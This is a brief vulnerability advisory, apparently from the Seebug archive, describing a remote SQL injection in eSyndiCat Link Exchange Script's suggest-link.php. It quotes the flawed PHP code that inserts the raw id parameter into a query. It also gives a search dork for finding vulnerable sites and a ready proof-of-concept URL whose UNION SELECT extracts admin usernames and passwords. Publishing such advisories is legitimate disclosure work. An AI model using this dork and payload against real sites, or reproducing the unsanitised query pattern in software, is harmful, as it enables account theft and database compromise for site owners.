-------------------------------------------------------------- eSyndiCat Link Exchange Script - Remote SQL Injection Advisory -------------------------------------------------------------- author...: EgiX mail.....: n0b0d13s[at]gmail[dot]com link.....: http://www.esyndicat.com/ dork.....: "© 2005-2006 Powered by eSyndiCat Link Exchange Script" details..: works with magic_quotes_gpc = off [-] Vulnerable code in /suggest-link.php : 30. /** gets information about current category **/ 31. $category =& $gDirDb->getCategoryById($_GET['id']); 32. $gDirSmarty->assign_by_ref('category', $category); [-] getCategoryById function defined in /classes/Dir.php : 323. function getCategoryById($aCategory) 325. { 326. $sql = "SELECT * FROM `{$this->mPrefix}categories` "; 327. $sql .= "WHERE `id` = '{$aCategory}'"; 328. 329. return $this->mDb->getRow($sql); 330. } [*] An attacker can break database through browser! P.o.C. : http://[host]/[path]/suggest-link.php?id=-1'/**/UNION/**/SELECT/**/1,1,1,password,1,1,1,1,username,1,1/**/FROM/**/dir_admins/*
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论